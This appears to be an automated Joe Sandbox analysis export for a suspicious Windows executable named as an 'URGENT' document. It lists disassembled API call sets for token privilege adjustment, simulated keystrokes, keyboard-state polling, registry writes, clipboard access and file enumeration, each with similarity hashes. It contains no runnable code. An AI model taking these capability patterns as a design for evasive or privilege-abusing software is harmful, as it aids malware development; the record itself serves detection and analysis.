                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
                                                        • keybd_event.USER32(00000012,00000000), ref: 0043D6F2
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
                                                        • keybd_event.USER32(00000012,00000000), ref: 0043D701
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
                                                        • keybd_event.USER32(00000012,00000000), ref: 0043D70F
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
                                                        • keybd_event.USER32(00000012,00000000), ref: 0043D71E
                                                        • SetForegroundWindow.USER32(?), ref: 0043D721
                                                        • AttachThreadInput.USER32(?,?,00000000), ref: 0043D748
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 4125248594-2988720461
                                                        • Opcode ID: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                        • Instruction ID: c1ca6a344bcdfaba0e974823023d667c19296b4d148af4653ab9434bf50545cf
                                                        • Opcode Fuzzy Hash: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                        • Instruction Fuzzy Hash: AE319671A40318BBEB206F619C49F7F7F6CEB48B50F10443AFA04EA1D1D6B45D11ABA9
                                                        APIs
                                                          • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                          • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                          • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                        • _memset.LIBCMT ref: 00458353
                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
                                                        • CloseHandle.KERNEL32(?), ref: 004583B6
                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
                                                        • GetProcessWindowStation.USER32 ref: 004583E6
                                                        • SetProcessWindowStation.USER32(00000000), ref: 004583F0
                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A
                                                          • Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                          • Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                        • String ID: $default$winsta0
                                                        • API String ID: 2063423040-1027155976
                                                        • Opcode ID: a6581c019a875865fe98435da562a08335aaf20913fddee574ee62798222a6d0
                                                        • Instruction ID: 3323b63beeccf06d974511bf231c05544c13643482a2b8641c754c26865e528a
                                                        • Opcode Fuzzy Hash: a6581c019a875865fe98435da562a08335aaf20913fddee574ee62798222a6d0
                                                        • Instruction Fuzzy Hash: F3814871900209BFDF119FA5DC45AEE7B78AF08305F14416EFC10B6262EF399A19DB28
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
                                                        • FindClose.KERNEL32(00000000), ref: 0046C7E1
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
                                                        • __swprintf.LIBCMT ref: 0046C890
                                                        • __swprintf.LIBCMT ref: 0046C8D3
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                        • __swprintf.LIBCMT ref: 0046C927
                                                          • Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1
                                                        • __swprintf.LIBCMT ref: 0046C975
                                                          • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
                                                          • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B
                                                        • __swprintf.LIBCMT ref: 0046C9C4
                                                        • __swprintf.LIBCMT ref: 0046CA13
                                                        • __swprintf.LIBCMT ref: 0046CA62
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                        • API String ID: 3953360268-2428617273
                                                        • Opcode ID: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                                                        • Instruction ID: 7d9c3182f1c50569ad22dcb29b7867164fdd6ce968260aea251e7ba13e5350ae
                                                        • Opcode Fuzzy Hash: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                                                        • Instruction Fuzzy Hash: AFA13EB1504304ABC710EFA5C885DAFB7ECFF94708F40492EF585D6192EA38DA08CB66
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0046EFB6
                                                        • _wcscmp.LIBCMT ref: 0046EFCB
                                                        • _wcscmp.LIBCMT ref: 0046EFE2
                                                        • GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
                                                        • FindClose.KERNEL32(00000000), ref: 0046F031
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
                                                        • _wcscmp.LIBCMT ref: 0046F074
                                                        • _wcscmp.LIBCMT ref: 0046F08B
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
                                                        • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
                                                        • FindClose.KERNEL32(00000000), ref: 0046F0D2
                                                        • FindClose.KERNEL32(00000000), ref: 0046F0E4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                        • String ID: *.*
                                                        • API String ID: 1803514871-438819550
                                                        • Opcode ID: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                        • Instruction ID: e0d4b25dfa95f140917fd6c0b332215adfde449a0ea65fd213ed944f24ec6cf3
                                                        • Opcode Fuzzy Hash: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                        • Instruction Fuzzy Hash: EC31E7325011187ADF14EFA4EC48AEF77AC9F44360F10057BE844D2191EB79DA88CB6E
                                                        APIs
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
                                                        • RegCloseKey.ADVAPI32(?), ref: 00480DB2
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00480DBF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectCreateRegistryValue
                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                        • API String ID: 536824911-966354055
                                                        • Opcode ID: 5b4aa97b492db371f5b262f2bb6d028803485e81deb917c00da9c6b1dd1dfccf
                                                        • Instruction ID: 75f0257f13d9dd97868b06569ad7b6a65722ecc89240c550ead6eefe92fcdcfb
                                                        • Opcode Fuzzy Hash: 5b4aa97b492db371f5b262f2bb6d028803485e81deb917c00da9c6b1dd1dfccf
                                                        • Instruction Fuzzy Hash: 3E023A756106119FCB54EF15D841E2AB7E5FF89314F04886EF8899B3A2CB38EC45CB89
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
                                                        • API String ID: 0-559809668
                                                        • Opcode ID: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                        • Instruction ID: 6096d484c95c14ad7aa8192e29e4e3e8d71b99b3f093478e4f466f6acf52d5c9
                                                        • Opcode Fuzzy Hash: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                        • Instruction Fuzzy Hash: 13727E75E002199BDB14CF59C8807EEB7B5FF48311F15816BE809EB291E7389E85CB98
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0046F113
                                                        • _wcscmp.LIBCMT ref: 0046F128
                                                        • _wcscmp.LIBCMT ref: 0046F13F
                                                          • Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
                                                        • FindClose.KERNEL32(00000000), ref: 0046F179
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
                                                        • _wcscmp.LIBCMT ref: 0046F1BC
                                                        • _wcscmp.LIBCMT ref: 0046F1D3
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
                                                        • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
                                                        • FindClose.KERNEL32(00000000), ref: 0046F21A
                                                        • FindClose.KERNEL32(00000000), ref: 0046F22C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                        • String ID: *.*
                                                        • API String ID: 1824444939-438819550
                                                        • Opcode ID: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                        • Instruction ID: 359f8111c83e04d014ff149dee767818393646aa3285bf91305061d844a33625
                                                        • Opcode Fuzzy Hash: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                        • Instruction Fuzzy Hash: 1031C3365001196ADF10AEA4FC54AEE77AC9F45360F2005BBE844A2190EA39DE89CA6D
                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
                                                        • __swprintf.LIBCMT ref: 0046A231
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
                                                        • _memset.LIBCMT ref: 0046A2B2
                                                        • _wcsncpy.LIBCMT ref: 0046A2EE
                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
                                                        • CloseHandle.KERNEL32(00000000), ref: 0046A32E
                                                        • RemoveDirectoryW.KERNEL32(?), ref: 0046A337
                                                        • CloseHandle.KERNEL32(00000000), ref: 0046A341
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                        • String ID: :$\$\??\%s
                                                        • API String ID: 2733774712-3457252023
                                                        • Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                        • Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
                                                        • Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                        • Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00460097
                                                        • SetKeyboardState.USER32(?), ref: 00460102
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00460122
                                                        • GetKeyState.USER32(000000A0), ref: 00460139
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00460168
                                                        • GetKeyState.USER32(000000A1), ref: 00460179
                                                        • GetAsyncKeyState.USER32(00000011), ref: 004601A5
                                                        • GetKeyState.USER32(00000011), ref: 004601B3
                                                        • GetAsyncKeyState.USER32(00000012), ref: 004601DC
                                                        • GetKeyState.USER32(00000012), ref: 004601EA
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00460213
                                                        • GetKeyState.USER32(0000005B), ref: 00460221
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                        • Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
                                                        • Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                        • Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B
                                                        APIs
                                                          • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC
                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0048082F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1240663315-0
                                                        • Opcode ID: ff6242e509249e2b93cc6a9529d4c0709292e42bb850a8eecd1f0fa66da35eee
                                                        • Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
                                                        • Opcode Fuzzy Hash: ff6242e509249e2b93cc6a9529d4c0709292e42bb850a8eecd1f0fa66da35eee
                                                        • Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                        • String ID:
                                                        • API String ID: 1737998785-0
                                                        • Opcode ID: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                                        • Instruction ID: 6a8dd1f95291b63ae5b16d2a5a0d869dcb5166510358231783c1e180ef80644f
                                                        • Opcode Fuzzy Hash: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                                        • Instruction Fuzzy Hash: CE2191352002109FDB00AF54EC09B6E7BA8EF44751F10847AF945E72A2EB38AC05CB5D
                                                        APIs
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
                                                        • Sleep.KERNEL32(0000000A), ref: 0046F470
                                                        • _wcscmp.LIBCMT ref: 0046F484
                                                        • _wcscmp.LIBCMT ref: 0046F49F
                                                        • FindNextFileW.KERNEL32(?,?), ref: 0046F53D
                                                        • FindClose.KERNEL32(00000000), ref: 0046F553
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                        • String ID: *.*
                                                        • API String ID: 713712311-438819550
                                                        • Opcode ID: 92a288f11230d480a522b0c0f936cc6b9b9cd0aeee01b41ae93ea83b3e82efad
                                                        • Instruction ID: 52678bcd3f78e7a2dee1500e624958e336d76892905c76040bb4fc6126c74c58
                                                        • Opcode Fuzzy Hash: 92a288f11230d480a522b0c0f936cc6b9b9cd0aeee01b41ae93ea83b3e82efad
                                                        • Instruction Fuzzy Hash: D0418D71904219AFCF10EF64DC45AEFBBB4FF04314F50446BE855A2291EB38AE88CB59
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __itow__swprintf
                                                        • String ID: 3cA$_A
                                                        • API String ID: 674341424-3480954128
